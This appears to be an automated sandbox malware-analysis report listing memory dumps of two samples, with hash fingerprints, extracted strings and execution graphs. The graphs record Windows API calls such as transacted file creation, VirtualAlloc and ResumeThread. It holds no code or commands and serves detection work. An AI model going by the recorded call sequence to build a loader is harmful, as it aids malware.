                                                              • Instruction Fuzzy Hash: 1E41B67160C9499FDB99FF2CC4559A5B7F1FBA8314B0401AED10ED3282CE39E855CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 93cd74e8039307a55ff68026d64305d8c6d9d8d33d05cb463fdd5044e98916ed
                                                              • Instruction ID: b476ea60eb43b7c2fa0384fe568dabefcf2462f91365615e1157cf4f4fd39479
                                                              • Opcode Fuzzy Hash: 93cd74e8039307a55ff68026d64305d8c6d9d8d33d05cb463fdd5044e98916ed
                                                              • Instruction Fuzzy Hash: A4415071A0C9499FDBA8FF1CC495DA5B7E5FBA9314B0401AAD10ED3192DE38E885CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 228a8052c9944c45bd99d391a6ca260bd25c9639fb96595fc7705495fe735c3b
                                                              • Instruction ID: fad65aa3b831e41fce19909cb99d559ae45597adb1a380af93c6176471a39416
                                                              • Opcode Fuzzy Hash: 228a8052c9944c45bd99d391a6ca260bd25c9639fb96595fc7705495fe735c3b
                                                              • Instruction Fuzzy Hash: 1A41A130D1C9AA8EF779EB6884546B877B1FF64340F1445BAC04EC75C6DE3CA9858B81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86ac57139805ec029663edba1dd705ca806c6a8d276defd0c93ede0f2434b2a8
                                                              • Instruction ID: baab755860f5879ce0874ed1be0f1dd435c2e315c304098813081d53b8f37fe1
                                                              • Opcode Fuzzy Hash: 86ac57139805ec029663edba1dd705ca806c6a8d276defd0c93ede0f2434b2a8
                                                              • Instruction Fuzzy Hash: 2231B37160C9588FDB99EF2CC0559A477F1FBA9314B0401AED00ED7292CE29E841CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 24874cae0937ef057515a6c2f44bbb4956f0c3d419d73136ea052383290541a7
                                                              • Instruction ID: 05cbb9af217cfbda8ab918a436965e21074f73c157012cc5fcb5173e99b36c61
                                                              • Opcode Fuzzy Hash: 24874cae0937ef057515a6c2f44bbb4956f0c3d419d73136ea052383290541a7
                                                              • Instruction Fuzzy Hash: 2131937160C9499FDBA9FF2CC055DA5B7E5FBA9314B0401AED04ED7192DE28E881CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              • Opcode Fuzzy Hash: 99b8ab9407f4fa21584cafd4291c5c0b794b68604842eebb0a8072687f69a682
                                                              • Instruction Fuzzy Hash: 1FF0627144D2C59FE322AF7088555D57FB4AF42250B5840EBE4898B0A2D52C9646CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 596ac7f7fe12048eaa3be30a70952a2d65e317ec1774ba9d7416dac266f11e3c
                                                              • Instruction ID: e27421ca614951471a3138219b5ac1269df60cf451d673c5aa2a6e7db902d2e5
                                                              • Opcode Fuzzy Hash: 596ac7f7fe12048eaa3be30a70952a2d65e317ec1774ba9d7416dac266f11e3c
                                                              • Instruction Fuzzy Hash: 79D0122185F7D60FDB26BB7508160987FA0AF13594FCD45FFD0489B0D3D48D48598741
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ea27cff136e5befd12590b4a3c2f7deb0091858bb4dacae0161e440977089687
                                                              • Instruction ID: 4704e87652d85ce8349f7875a365ba86e3e7e3f1f2244dd0e00996685b1d8066
                                                              • Opcode Fuzzy Hash: ea27cff136e5befd12590b4a3c2f7deb0091858bb4dacae0161e440977089687
                                                              • Instruction Fuzzy Hash: 38D0CA65A0D6D3CDF239BE2282202BE65B19F04380E70043FC0AF41EC1CD1EF8416E12
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76c3e732c25a46d756dc155dc3f2733b154266a48b784f7b6f5b68af5c9b6ed2
                                                              • Instruction ID: 1b3945bca545df5b7a8f179cb771f9d35fc95fc1e2a52d10c5a5953aab9a8a79
                                                              • Opcode Fuzzy Hash: 76c3e732c25a46d756dc155dc3f2733b154266a48b784f7b6f5b68af5c9b6ed2
                                                              • Instruction Fuzzy Hash: 54D0C920A0C5D78DF2387E01802027991B05F00B81FE0403FE09F618D5CD1CF5036E0E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1df8ec1b2276e4f21e7e44ab98a2a9294dbe63b6dc9a3e4a15876ac67ac0012a
                                                              • Instruction ID: c2780b3e8a551d6ff5c0023d0354161d9c1ec32eb81a41fa67deb01cc7bd70a3
                                                              • Opcode Fuzzy Hash: 1df8ec1b2276e4f21e7e44ab98a2a9294dbe63b6dc9a3e4a15876ac67ac0012a
                                                              • Instruction Fuzzy Hash: DDB01200F0C387AFF5303CF0084003D00A00B442C0FD00637D10F491C3DD4CB8011A54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fe024d7caf76da19ee77b13c43f71042a6ae10138f4b956fec9464724dc46fba
                                                              • Instruction ID: fd2cb6cd08c242a6eb9b2022fff45717040956094a8f0ca83dd3a33ae5382348
                                                              • Opcode Fuzzy Hash: fe024d7caf76da19ee77b13c43f71042a6ae10138f4b956fec9464724dc46fba
                                                              • Instruction Fuzzy Hash: 9FB01200F0C283CFF13038B0088103C00B01B052C1E900533D10F55AC7DC5CF8401A50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2215578159.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848f40000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6d4dc4b214ebee9f362b5336a8f0ead6a3224fcca0ced91cd7e4c7d9f432affc
                                                              • Instruction ID: 5ff0e2e58be74ba01c62582b07929e6448912352068698b421e7eb29eca28288
                                                              • Opcode Fuzzy Hash: 6d4dc4b214ebee9f362b5336a8f0ead6a3224fcca0ced91cd7e4c7d9f432affc
                                                              • Instruction Fuzzy Hash: F2819370908A8D8FEBA8EF18C8457E97BE1FF59350F10412EE84DC7291DB749985CB85
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2216911926.00007FF849130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849130000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff849130000_BlockrefBrokerperf.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: -_^H$-_^J$-_^L$-_^N
                                                              • API String ID: 0-1308837779
                                                              • Opcode ID: b8ee6cbc31d57d68a3c9e1340efff16fc2f3c12cf0fe83fc1cb37fa40d964bff
                                                              • Instruction ID: 59c866a5357090b5d091b85c047121f8f40fb5b174413cf870d2d892f15890e7
                                                              • Opcode Fuzzy Hash: b8ee6cbc31d57d68a3c9e1340efff16fc2f3c12cf0fe83fc1cb37fa40d964bff
                                                              • Instruction Fuzzy Hash: A9D0C9DD8194B61ED30457B028F23FA2AC4950135CBB03B27D966CD483E549D2C7E1A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:19.2%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:26
                                                              Total number of Limit Nodes:2
                                                              execution_graph 15101 7ff848f39ebd 15103 7ff848f9ffe0 15101->15103 15102 7ff848fa0052 15103->15102 15106 7ff848f9f1d0 15103->15106 15105 7ff848fa00c9 15108 7ff848f9f1db 15106->15108 15107 7ff848f9f27e 15107->15105 15108->15107 15110 7ff848f9f297 15108->15110 15111 7ff848f9f2a2 15110->15111 15112 7ff848f9f2ea ResumeThread 15110->15112 15111->15107 15114 7ff848f9f3b4 15112->15114 15114->15107 15115 7ff848f3d5d1 15116 7ff848f3d5ed GetSystemInfo 15115->15116 15118 7ff848f3d6c5 15116->15118 15093 7ff848f3a390 15094 7ff848f3a39c 15093->15094 15097 7ff848f39fb0 15094->15097 15096 7ff848f3a400 15098 7ff848f39fb9 CreateFileTransactedW 15097->15098 15100 7ff848f3bba8 15098->15100 15100->15096 15085 7ff848f3bc35 15086 7ff848f3bc5f WriteFile 15085->15086 15088 7ff848f3bdcf 15086->15088 15089 7ff848f3da35 15090 7ff848f3da5f VirtualAlloc 15089->15090 15092 7ff848f3db7f 15090->15092

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: o-_^$p-_^
                                                              • API String ID: 0-983702534
                                                              • Opcode ID: 06a5b7d7f708a3a18deae17685d16aba443bc9ac7b46c8574ecb19afddafe3a0
                                                              • Instruction ID: 917e921f58a232e8dfe78e539cedbfe461713ca79c1cd1dea989d9a393588938
                                                              • Opcode Fuzzy Hash: 06a5b7d7f708a3a18deae17685d16aba443bc9ac7b46c8574ecb19afddafe3a0
                                                              • Instruction Fuzzy Hash: 1952876781F1E25FE261BA78A8964E77F60EF022ACF1C43B7D08C4E0D3ED0D65458669
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2492 7ff848f3b98a-7ff848f3b997 2493 7ff848f3b999-7ff848f3b9a1 2492->2493 2494 7ff848f3b9a2-7ff848f3ba68 2492->2494 2493->2494 2498 7ff848f3ba6a-7ff848f3ba81 2494->2498 2499 7ff848f3ba84-7ff848f3bba6 CreateFileTransactedW 2494->2499 2498->2499 2500 7ff848f3bba8 2499->2500 2501 7ff848f3bbae-7ff848f3bc30 2499->2501 2500->2501
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3252298897.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848f30000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID: CreateFileTransacted
                                                              • String ID:
                                                              • API String ID: 2149338676-0
                                                              • Opcode ID: 252ec7838a61f239a696f2125bac55e12d55ed9be2a6f601e774123ea61783df
                                                              • Instruction ID: 95adb8a726f22029990180593bf89f667deb98a7018ced97600a6ddbbb4f3987
                                                              • Opcode Fuzzy Hash: 252ec7838a61f239a696f2125bac55e12d55ed9be2a6f601e774123ea61783df
                                                              • Instruction Fuzzy Hash: 3B912470908A5C8FDB99DF58C894BE9BBF1FB6A310F1001AED04DE3291DB75A984CB44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 2504 7ff848f39fb0-7ff848f3ba68 2509 7ff848f3ba6a-7ff848f3ba81 2504->2509 2510 7ff848f3ba84-7ff848f3bba6 CreateFileTransactedW 2504->2510 2509->2510 2511 7ff848f3bba8 2510->2511 2512 7ff848f3bbae-7ff848f3bc30 2510->2512 2511->2512
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3252298897.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848f30000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 381c6f205e7dfce6354eeac176e9c76ab3ad3b69b9caadd9e9ffa64d86b9ea50
                                                              • Instruction ID: 3a555060ae18cbedde22edaeb181b6544711591d4ee0b832d580f6ee9aad9f82
                                                              • Opcode Fuzzy Hash: 381c6f205e7dfce6354eeac176e9c76ab3ad3b69b9caadd9e9ffa64d86b9ea50
                                                              • Instruction Fuzzy Hash: 1181D070908A5C8FDB98EF58C894BA9BBF1FB69301F1051AED04EE3651DB75A980CF44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: 97c365bd1d6ce9f59e720d92bb4892b80bcb86680dba366e2cf13bc808191854
                                                              • Instruction ID: 689c2334ba2c9c5a9dbb1f0fdc60fb2cdd122dc0fe82cd338fef399b6eb552c8
                                                              • Opcode Fuzzy Hash: 97c365bd1d6ce9f59e720d92bb4892b80bcb86680dba366e2cf13bc808191854
                                                              • Instruction Fuzzy Hash: 6AF11030A1DA868FE758EF28948157577E1FF95384B1445BAD04ACB297EE2CEC43CB81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3252298897.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848f30000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 6f35de5c8cb51e694ba8b77727ff181c9c9e68bc99c19b61681efc9d89cd5eef
                                                              • Instruction ID: 9f556da634dba5a63923b0b9e3bf58ffc997556d63b901c6d74a0dfc94e9e2ea
                                                              • Opcode Fuzzy Hash: 6f35de5c8cb51e694ba8b77727ff181c9c9e68bc99c19b61681efc9d89cd5eef
                                                              • Instruction Fuzzy Hash: 70612470908A5C8FDB98DF58C895BE9BBF1FB69311F1041AED04DE3291DB74A984CB44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3252298897.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848f30000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem
                                                              • String ID:
                                                              • API String ID: 31276548-0
                                                              • Opcode ID: 70dfae036d48bc2af54c5688c92fe1f5636d3d0676201393d74f13c15c076b03
                                                              • Instruction ID: 400a9473d5ef0f78b2cd50a33296ed724e6cdc7b67dc14d276fdbaeedd044d4a
                                                              • Opcode Fuzzy Hash: 70dfae036d48bc2af54c5688c92fe1f5636d3d0676201393d74f13c15c076b03
                                                              • Instruction Fuzzy Hash: 76417C71909A4C8FEB98EFA8D849BE9BBF0FB55311F04416BD00DD7292DB34A945CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3252298897.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848f30000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 646199347f16c1e7a2be558a60df47eb398132c9022a93c23325e5c92ccd0310
                                                              • Instruction ID: a48bef8578fbda3c5d00d006d82c611536fbe0dd32cd5cb9a784625e91e8b07d
                                                              • Opcode Fuzzy Hash: 646199347f16c1e7a2be558a60df47eb398132c9022a93c23325e5c92ccd0310
                                                              • Instruction Fuzzy Hash: 41413874D08A1C8FDB98EFA8D845AEDBBF0FB59310F10416AD40DE7252DB75A885CB44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3252298897.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848f30000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem
                                                              • String ID:
                                                              • API String ID: 31276548-0
                                                              • Opcode ID: a8574b8632e64272448d299276524529248d75998a641e3783658e30ad664f5e
                                                              • Instruction ID: 60634cd033d2083cac76f0ed9576b0ea8213e8a8d4da4e0a33d6a0a6f5fc541f
                                                              • Opcode Fuzzy Hash: a8574b8632e64272448d299276524529248d75998a641e3783658e30ad664f5e
                                                              • Instruction Fuzzy Hash: B241A17090D68C8FDB99EFA8D859BE9BBF0EF56310F0441ABD04DD7292CA745845CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3252298897.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff848f30000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: ed4d3a84ab8a238038e417a91b7194b5902d5c4c72355cb8b5645de181a8b9b9
                                                              • Instruction ID: 346bf11f851a6f4c055f6d06228bd934fd4f6c97bfa5d6e3f40024a228e82d5e
                                                              • Opcode Fuzzy Hash: ed4d3a84ab8a238038e417a91b7194b5902d5c4c72355cb8b5645de181a8b9b9
                                                              • Instruction Fuzzy Hash: E9513A70908A5C8FDF58EF58C855BE9BBF1FB69310F1041AAD04DE3252DB70A985CB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: x-_I
                                                              • API String ID: 0-2373532275
                                                              • Opcode ID: 97385732bdcb389d09c20136fd832f40395d7fbfc00ca907ee2615545b2ae65e
                                                              • Instruction ID: 017cde7b05720bead3138d38ce0355480d354762bf72cb3b1142aa0fcf88cd5d
                                                              • Opcode Fuzzy Hash: 97385732bdcb389d09c20136fd832f40395d7fbfc00ca907ee2615545b2ae65e
                                                              • Instruction Fuzzy Hash: 5C51D666D0DAC78EFA757A2828141792E90AF65794F1801FBD14CBB1DBFC2C6C068781
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07015bbb905721367391dce81b1eb29f42cef2c6a8abfd7396dd62b4f2276656
                                                              • Instruction ID: a23a3c3ae7be5c83248f132eae8d0da4d6d52593d7603047e07c0d80c1797460
                                                              • Opcode Fuzzy Hash: 07015bbb905721367391dce81b1eb29f42cef2c6a8abfd7396dd62b4f2276656
                                                              • Instruction Fuzzy Hash: 8F916D705196468FEB1DEF08D1E11B537A1FF49351B5045BEC84A8B68AEB3CE852CF81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d27aaa8c6b0d0a55a6168cbab3528c3f74ecab4a394836a3a971db2c3350bec7
                                                              • Instruction ID: 9c80927319d326e500d932e4e78f9caa8339a554a4930cc3fe5821d5b700db0c
                                                              • Opcode Fuzzy Hash: d27aaa8c6b0d0a55a6168cbab3528c3f74ecab4a394836a3a971db2c3350bec7
                                                              • Instruction Fuzzy Hash: 6951183160DB8A4FD769AF28984557077E0FF563A0B5506BFC08AC71E3E929B847CB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0f960632d5dd970d8ca1abe1ba976e574903ae9cf635b3cc81b70fa16131026b
                                                              • Instruction ID: 3bbed4625cc6dd7d5a239aca0456ddef8fdb8b2339b42e6a5dc8a3676b2a027c
                                                              • Opcode Fuzzy Hash: 0f960632d5dd970d8ca1abe1ba976e574903ae9cf635b3cc81b70fa16131026b
                                                              • Instruction Fuzzy Hash: 0571B33090DAC68FE76AFF2894905A4BBA0FF15350F5441B9D44AC7AC6EB2CB851CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e136ec1db0e3f90a7c08f0f76602045f4067f2dd9316818b0b7d38c123352fd0
                                                              • Instruction ID: 3e2d24b00cf5c5487c50135b4ee4c0560d8c636d291f8705b09e2b4e019bdb64
                                                              • Opcode Fuzzy Hash: e136ec1db0e3f90a7c08f0f76602045f4067f2dd9316818b0b7d38c123352fd0
                                                              • Instruction Fuzzy Hash: C861AF30D1D68E9EEBA5FF6488546BDBBB1FF54380F5404BAD00AE7192EA3C6841CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: af63e93fec58e9d4c845af77ed65d530557109b05afaab4ec365b6de5b89888e
                                                              • Instruction ID: 423c4152aa33128db2ba1612140a16ae7e99238c11cf5fa44fa6d63f50114114
                                                              • Opcode Fuzzy Hash: af63e93fec58e9d4c845af77ed65d530557109b05afaab4ec365b6de5b89888e
                                                              • Instruction Fuzzy Hash: 11513D70D0999D8FDB95EF68D895AEDBBB1FF58340F14016AD00DE7292DB38A981CB40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 04f2062b82d07c56a53ebcefbe742f54e02e1d415d5744a78334ea0f41f6602f
                                                              • Instruction ID: b80eaed6c6bcc77c1e3da41869c21aa707e1364b9f3f732120126c7b921d3763
                                                              • Opcode Fuzzy Hash: 04f2062b82d07c56a53ebcefbe742f54e02e1d415d5744a78334ea0f41f6602f
                                                              • Instruction Fuzzy Hash: A251D371D0E5DA9FDB95FB68A8600EA3BB0FF45358F0401B6D049DB193EE2C6805CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 74214a034e9f3d3b00ea4825e696fcec49ae18c9dfe2c4d60244f6597d33bb1b
                                                              • Instruction ID: 57c62c33a608b0a747b8b2792792a9aea6c61d23f8fc8a2ced1a233d04ff9103
                                                              • Opcode Fuzzy Hash: 74214a034e9f3d3b00ea4825e696fcec49ae18c9dfe2c4d60244f6597d33bb1b
                                                              • Instruction Fuzzy Hash: 0141532150E3C24FE7276F6898604A07FB0EF573A1B2901FBC589CB1D3E91C6846C7A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
